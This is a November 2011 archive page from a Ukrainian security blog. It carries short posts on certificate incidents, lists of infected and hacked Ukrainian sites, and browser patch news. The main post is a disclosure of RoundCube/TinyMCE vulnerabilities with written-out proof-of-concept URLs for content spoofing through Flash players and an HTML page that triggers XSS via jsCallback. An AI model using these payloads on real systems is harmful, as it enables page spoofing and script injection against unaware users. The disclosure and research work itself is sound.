Архів за Листопад, 2011

Недовірені сертифікати Digicert Sdn. Bhd.

22:48 30.11.2011

Виявлені недовірені сертифікати Digicert Sdn. Bhd.

Уразливі продукти: OpenSSL 0.9, OpenSSL 1.0.

Центром, що засвідчує, було видано кілька слабких сертифікатів.

Ситуація з цим видавцем сертифікатів подібна до інцидента з Comodo, що стався весною, та інцидента з DigiNotar, що стався влітку. Такі виробники браузерів як Mozilla та Microsoft вже анулювали сертифікати Digicert в своїх продуктах.

Інфіковані сайти №103

20:18 30.11.2011

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://ool.ua - інфекція була виявлена 16.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://aviso.ua - інфекція була виявлена 16.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://vrazrabotke.com.ua - інфекція була виявлена 30.11.2011. Зараз сайт входить до переліку підозрілих.
  • http://fn.ua - інфекція була виявлена 16.11.2011. Зараз сайт не входить до переліку підозрілих.
  • http://ukrdeftech.com.ua - інфекція була виявлена 19.11.2011. Зараз сайт не входить до переліку підозрілих.

Численні уразливості в RoundCube

17:20 30.11.2011

18.10.2011

В жовтні, 12.10.2011, а також додатково 15.10.2011, я знайшов численні уразливості в RoundCube. Це Brute Force, Content Spoofing, Cross-Site Scripting та Clickjacking уразливості. Частина з цих дірок - це уразливості в TinyMCE, що постачається з RoundCube. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

30.11.2011

Brute Force:

http://site/index.php

Content Spoofing:

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS:

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Content Spoofing:

http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://site2/1.flv

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

Clickjacking:

RoundCube вразливий до віддаленого логіну з використанням Clickjacking. Про дані атаки я вже розповідав в своїй статті.

В версії RoundCube 0.6-RC доданий захист от Clickjacking атак (окрім вищезгаданої форми логіну), до якого вразливий весь функціонал додатку. Але захист недостатньо ефективний, так як спрацьовує лише в нових версіях деяких браузерів, тому користувачі старих браузерів будуть незищені. Ну, а старі версії RoundCube повністю вразливі до Clickjacking.

CS та XSS - це уразливості в TinyMCE.

Уразливі RoundCube 0.6 та попередні версії (перевірялося в 0.4-beta та 0.6). В останній версії RoundCube 0.6 використовує moxieplayer.swf (замість flv_player.swf). Як повідомили мені розробники, в версії RoundCube 0.7 уразливості будуть виправлені.

Уразливості в плагінах для WordPress №53

23:56 29.11.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Zingiri Web Shop, Lanoba Social та advanced-text-widget. Для котрих з’явилися експлоіти. Zingiri Web Shop - це плагін для створення онлайн магазина, Lanoba Social - це плагін для інтеграції з соціальними мережами (такими як Facebook, Twitter та іншими), advanced-text-widget - це текстовий віджет з розширеними можливостями для розміщення контенту.

  • Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Vulnerability (деталі)
  • wordpress Lanoba Social Plugin Xss Vulnerabilities (деталі)
  • Wordpress advanced-text-widget Plugin Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в Google Chrome

22:47 29.11.2011

Виявлені численні уразливості безпеки в Google Chrome.

Уразливі версії: Google Chrome 15.0.

Виконання коду, підвищення привілеїв, DoS.

  • Численні уразливості безпеки в Google Chrome (деталі)

Вийшов Mozilla Firefox 8.0.1

20:26 29.11.2011

В листопаді, 21.11.2011, вийшов Mozilla Firefox 8.0.1. Нова версія браузера вийшла майже через два тижні після виходу Firefox 8.

Нова версія позиціонується розробниками як баг-фікс випуск, тобто без секюріті виправлень. Але я вважаю, що дана версія містить виправлення, які покращують безпеку браузера.

В даній версії зроблені наступні виправлення:

  • Виправлене вибивання в Mac OS X, що виникало в деяких випадках, коли завантажений аплет Java при інстальованій Java SE 6 версії 1.6.0_29.
  • Виправлене вибивання при запуску в Windows, що спричинене версіями RoboForm старіше ніж 7.6.2.

Якщо другу проблему можна віднести до бага (що не можна використати для атаки), то перша проблема - це вже DoS уразливість через аплет Java (що можна використати для атаки).

Добірка експлоітів

17:10 29.11.2011

В даній добірці експлоіти в веб додатках:

  • Exploit will crash AT-TFTP Server v1.8 Service (деталі)
  • KnFTPd FTP Server v1.0.0 Multiple Command Remote Buffer Overflow Exploit (деталі)
  • zFTP Server “cwd” Remote Denial-of-Service (деталі)
  • Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability (деталі)
  • jsboard 2.0.10 (login.php table) Local File Inclusion Exploit (деталі)

Похакані сайти №170

23:50 26.11.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://vikna-ua.com (хакерами з RKH) - 17.08.2011, зараз сайт вже виправлений адмінами
  • http://penstyle.net (хакерами з RKH) - 17.08.2011, зараз сайт вже виправлений адмінами
  • http://clubtur.net (хакерами з RKH) - 17.08.2011, зараз сайт вже виправлений адмінами
  • http://yabschool.com.ua (хакером Mc.Timy)
  • http://agroptaha.com (хакером TheScream) - 21.11.2011, зараз на сайті немає контенту

Новини: голлівудський хакер, виправлення в Chrome та уразливості в Flash і Apache

22:48 26.11.2011

За повідомленням www.xakep.ru, голлівудський хакер не визнає себе винним.

Чоловік зі штату Флорида не визнав себе винним у тому, що взломав поштові скриньки акторок Скарлетт Йоханссон, Міли Куніс і ще 50 знаменитостей і вкрав інтимні фото й особисту інформацію.

Взломи поштових акаунтів відбуваються щодня, але лише деяки випадки призводять до резонансу у ЗМІ. Людям, в тому числі знаменитостям, варто краще слідкувати за безпекою власних поштових акаунтів.

За повідомленням www.opennet.ru, виправлені уразливості в Chrome.

Після виходу Google Chrome 15, вийшов коригуючий реліз веб браузера Google Chrome (15.0.874.120) в якому усунуто 7 уразливостей, з яких 5 позначені як небезпечні. Серед уразливостей:

  • звертання до звільненого блоку пам’яті в реалізації кодека Theora;
  • вихід за припустимі границі при обробці медіаконтейнерів MKV і Vorbis;
  • пошкодження пам’яті при декодуванні VP8;
  • переповнення купи в декодері Vorbis;
  • переповнення буфера в коді маппінга шейдерів;
  • звертання до звільненої пам’яті при редагуванні;
  • усунення уразливостей у Flash-плагіні.

За повідомленням www.opennet.ru, виявлені уразливості в Adobe Flash, Apache та інших додатках.

Компанія Adobe випустила оновлення Flash-плагіна (11.1.102.55) в якому усунуто 12 уразливостей, з яких 11 уразливостей приводять до проблем критичного характеру, що дозволяють організувати виконання коду зловмисника при обробці спеціально сформованого контенту.

У mod_setenvif зі складу http-сервера Apache знайдена уразливість, що дозволяє локальному користувачу підвищити свої привілеї в системі через створення спеціально скомпонованого вмісту директиви SetEnvIf у файлі .htaccess у сполученні з відправленням певним чином оформленого запиту. Наявність проблеми підтверджена у випусках 2.0.64 і 2.2.21.

Вийшов Google Chrome 15

20:11 26.11.2011

У жовтні, 25.10.2011, через півтора місяці після виходу Google Chrome 14, вийшов Google Chrome 15.

В браузері зроблено ряд нововведень. А також виправлено 18 уразливостей, з яких 11 позначені як небезпечні, 3 - помірні і 4 - незначні. Серед уразливостей не відзначено критичних проблем, що дозволили б обійти всі рівні захисту браузера.